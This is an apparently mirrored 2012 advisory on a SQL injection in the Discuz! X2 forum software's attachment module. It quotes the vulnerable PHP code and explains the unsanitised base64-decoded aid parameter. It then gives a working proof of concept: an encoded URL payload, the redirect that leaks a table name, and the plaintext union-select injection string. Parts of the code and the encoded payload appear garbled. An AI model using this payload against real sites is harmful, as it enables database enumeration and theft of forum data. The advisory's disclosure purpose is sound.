Discuz! X2 SQL injection vulnerability 0day-vulnerability warning-the black bar safety net

2012-03-09T00:00:00
ID MYHACK58:62201233302
Type myhack58
Reporter 佚名
Modified 2012-03-09T00:00:00

Description

File: source\module\forum\forum_attachment.php

if(! defined('IN_DISCUZ')) {

exit('Access Denied');

}

define('NOROBOT', TRUE);

@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|',

base64_decode($_G['gp_aid']));

if(! empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ". DB::table

('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {

dheader('location: forum. php? mod=redirect&goto=findpost&pid='.$ attach['pid'].'& amp;ptid='.$ attach

['tid']);

}

Variable aid directly base64_decode after the incoming SQL query, the resulting injection vulnerability to.

http://www.xxxx.net/forum.php?

mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2Vszwn0idesvefctevftkfnrsbmcm9ti

ElORk9STUFUSU9OX1NDSEVNQS5UQUJMRvmgd2hlcmugvefctevfu0niru1bpwrhdgfiyxnlkckgyw5kicbuqujmrv9oqu1fi

Gxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D

After turning URL

http://www.xxxx.net/forum.php?

mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member

Storm out the table name pre_common_admincp_member

The actual query is:

$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA. TABLES where

TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";

//die (urlencode(base64_encode($x)));